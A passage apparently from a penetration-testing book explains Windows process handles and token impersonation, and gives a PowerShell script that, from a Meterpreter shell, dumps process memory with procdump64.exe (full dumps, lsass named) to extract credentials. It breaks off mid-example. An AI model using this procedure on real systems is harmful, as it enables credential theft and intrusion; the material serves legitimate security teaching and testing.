are getting a list of all the process handles. A handle is a reference to an object. Programs create and open handles to get at another object, which may include external resources such as files, registry keys, tokens and other processes. You can see the PID in the leftmost column, followed by the name of the executable the process was created from, and after that the handle and the object the handle references. These are all process handles, so csrss.exe, for example, has references to many other processes. That does not by itself mean csrss.exe started up (spawned) those processes: csrss.exe is the Win32 subsystem process, and it keeps a handle to every Win32 process it tracks so it can do its bookkeeping and clean up when they exit. A process that does spawn children normally keeps handles to them as well, so it can wait on them or kill them later if necessary, which is why a handle to another process is always worth a second look.
Although none are listed there, tokens also show up in the handle list. Keep in mind that an access token represents a logged-on user's identity and privileges, so a token held by a process can be impersonated to gain access to resources, such as authenticating against applications that hold data we want. This is another reason to get PIDs this way: while looking at the handles, we will also see processes we may want to dump in order to extract tokens. For what we are doing here, we have what we need. We have the PIDs.
To use procdump64.exe, one thing remains. It is on the remote system since we uploaded it, but Sysinternals tools require that you accept the end-user license agreement (EULA) before they will run. We can do that by dropping to a shell on the remote system (type shell in Meterpreter, and you get a command prompt on the remote system). Once we are on the remote system and in the directory the file was uploaded to, which is where the shell starts by default, we just run procdump64.exe -accepteula. If we don't do that, the program prints out the EULA and tells us that we need to accept it. Accepting it is recorded as a value under the current user's registry hive (HKCU\Software\Sysinternals\ProcDump), so it only has to be done once per user; it also leaves an artifact that an investigator can later use to tell the tool was run on that system. The -accepteula switch can also be passed on the same command line as the dump itself, which is convenient when running non-interactively. One more caveat: dumping a process owned by another user or by SYSTEM (csrss.exe, lsass.exe and the like) requires an elevated shell holding SeDebugPrivilege, so if the dump fails with an access-denied error, that is the first thing to check.
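The same procedure, done from the command prompt that Meterpreter's shell command gives us, as an added example rather than code from the book: it accepts the EULA through the registry value that -accepteula sets, resolves the PID of a process by image name, runs procdump64.exe against it and checks that a dump file was written. It assumes procdump64.exe sits in the current directory (as in the upload scenario above), that PowerShell is available on the target, and that the target is 64-bit Windows; the parameter names ($ProcessName, $ProcDump, $OutDir) are my own.

```powershell
# Added example, not from the book: accept the ProcDump EULA and dump a process
# from the shell spawned by Meterpreter. Assumes procdump64.exe was uploaded to the
# current directory and that the target is 64-bit Windows (both assumptions).
# Run as: powershell -ExecutionPolicy Bypass -File dump.ps1 -ProcessName notepad
param(
    [Parameter(Mandatory = $true)][string]$ProcessName,
    [string]$ProcDump = (Join-Path (Get-Location) 'procdump64.exe'),
    [string]$OutDir   = (Get-Location).Path
)

if (-not (Test-Path $ProcDump)) { throw "procdump64.exe not found at $ProcDump" }

# -accepteula writes HKCU\Software\Sysinternals\ProcDump\EulaAccepted = 1 on first
# use. Writing it ourselves is equivalent and needs no admin rights (it is HKCU);
# either way the value is an artifact an investigator can find afterwards.
$eulaKey = 'HKCU:\Software\Sysinternals\ProcDump'
if (-not (Test-Path $eulaKey)) { New-Item -Path $eulaKey -Force | Out-Null }
Set-ItemProperty -Path $eulaKey -Name EulaAccepted -Value 1 -Type DWord

# Resolve the PID(s) the same way the book does by hand: by image name.
$procs = Get-Process -Name $ProcessName -ErrorAction SilentlyContinue
if (-not $procs) { throw "no running process named $ProcessName" }

foreach ($p in $procs) {
    $dump = Join-Path $OutDir ("{0}_{1}.dmp" -f $p.ProcessName, $p.Id)
    # -ma  = full memory dump (needed if tokens or credentials are to be extracted)
    # -accepteula is passed as well so the run is non-interactive on a fresh box.
    & $ProcDump -accepteula -ma $p.Id $dump | Out-Null
    if (Test-Path $dump) {
        Write-Output ("dumped PID {0} to {1} ({2:N0} bytes)" -f $p.Id, $dump, (Get-Item $dump).Length)
    } else {
        # Typical cause: the shell lacks SeDebugPrivilege for a process owned by
        # another user or SYSTEM; rerun from an elevated shell.
        Write-Warning ("procdump wrote no dump for PID {0} (exit code {1})" -f $p.Id, $LASTEXITCODE)
    }
}
```

Full dumps (-ma) of processes such as lsass.exe are large and are exactly what endpoint defences watch for, so on a real engagement the dump target and the output location should be chosen deliberately rather than left at these defaults.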
Example 6-14 shows dumping a process.
Example 6-14. Using procdump64.exe
C: